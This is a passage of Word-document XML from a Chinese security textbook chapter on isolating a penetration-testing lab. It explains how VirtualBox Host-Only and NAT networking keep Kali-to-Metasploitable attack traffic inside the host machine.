        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">VirtualBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络模式的实现原理清晰，便于我们讲解隔离网络的底层机制。VMware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Workstation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用户可通过对应的“仅主机模式”和“NAT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式”实现等价功能，核心原理相同。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对于选择</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VMware Workstation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的读者，VMware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的虚拟网络编辑器提供了与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VirtualBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">功能对等的网络模式。KVM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用户则可使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">virt-manager</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">virsh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux bridge </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> iptables/nftables </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实现相同级别的隔离。只要理解了下述网络隔离的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">原理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，任一平台的实现都是相通的①。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="35"/>
    <w:bookmarkStart w:id="36" w:name="网络隔离的核心host-only-vs.-nat"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络隔离的核心：Host-Only</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vs. NAT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">虚拟化平台提供了多种网络模式，其中与实验室隔离直接相关的是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">模式</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">模式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。理解二者的区别是设计隔离网络的前提。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在深入之前，需要重申一个来自馆藏体系的基础知识：IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">子网、路由、NAT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的工作原理已在《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 26 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（IP/路由/NAT）中系统讲授。本节直接应用这些概念到虚拟化网络设计中，不再重复</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP/IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基础。若读者对子网掩码、CIDR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表示法、默认网关等概念尚感陌生，请先回顾《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 26 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">模式（Network</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Address </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Translation）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式下，虚拟化平台为虚拟机提供一个“私有”IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址（通常由内置的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器分配，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">10.0.2.0/24</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">子网），并通过宿主机操作系统的网络栈执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">源地址转换（SNAT）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，将虚拟机发出的数据包的源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">替换为宿主机的物理接口</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后再发送到外部网络。回程数据包经过反向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">转换后送达虚拟机。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">隔离特性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是“单向”的：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">虚拟机可以访问外部网络（通过宿主机的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">转换），这是下载工具更新、安装依赖包所必需的。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">外部网络（以及宿主机本身所在的局域网内其他设备）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">无法主动发起连接到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">模式下的虚拟机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，因为虚拟机的私有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在外部不可路由，且没有针对该虚拟机的端口转发规则（除非用户显式配置）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">同一台宿主机上的多个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">虚拟机之间，默认可能可以通过各自的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">子网互通，但不同宿主机上的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">虚拟机之间相互隔离。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式提供了一定程度的“出向隔离”，但它不适用于构建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">攻击机与靶机相互通信</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的实验室场景。因为在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式下，攻击机和靶机各处于不同的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实例（或同一</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实例的不同端口），它们之间的通信需要经过宿主机协议栈的转发，引入了不必要的复杂性和不确定性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">模式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式创建一个完全封闭的虚拟网络，仅存在于宿主机内部。这个虚拟网络由一个虚拟交换机（Virtual</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch）构成，连接到该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络的所有虚拟机以及宿主机本身的一个虚拟网络适配器均挂载在此虚拟交换机上。这个网络</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">没有任何通向宿主机物理网络接口的路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——没有路由，没有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网关。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式的隔离特性是“双向”且“封闭”的：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接到同一</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络的虚拟机之间可以相互直接通信（由虚拟交换机在二层转发，依据</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址，原理见《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 24–25 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">宿主机与这些虚拟机之间也可以直接通信（通过宿主机上的虚拟网卡），这对于使用宿主机上的浏览器访问靶机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">界面、SSH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">客户端连接攻击机等操作极为便利。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">没有任何数据包可以从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络泄漏到外部物理网络，也没有外部流量可以进入此虚拟网络。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这是一个完全封闭的广播域。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这意味着什么呢？在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络中，你可以让</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击机对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机发起全端口</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描、暴力破解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SSH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">密码、执行缓冲区溢出漏洞利用——无论攻击流量有多么“猛烈”或“可疑”，它都会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">被物理隔离在宿主机内部</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，绝不会出现在你公司网络交换机的镜像端口上，更不会惊动你的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ISP。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[简化]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络类比为一栋没有门牌、没有通往外界的道路、只有内部对讲系统的地下掩体。掩体内的人可以互相喊话，但声音绝对传不到地面。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">当然，这个类比有其失效边界：如果宿主机本身已被入侵，攻击者可能通过宿主机作为跳板桥接到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络；或者在宿主机上配置了显式的路由转发/IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">转发（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/proc/sys/net/ipv4/ip_forward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），可能人为破坏</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的隔离。这属于宿主机安全范畴，详见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> X </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章的防御加固。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">主机网络模式对比与选型决策</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实验室的标准网络拓扑应是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">混合模式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">攻击机（Kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Linux）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">两张虚拟网卡</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。第一张绑定到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，用于执行</w:t>
      </w:r>
      <w:r>
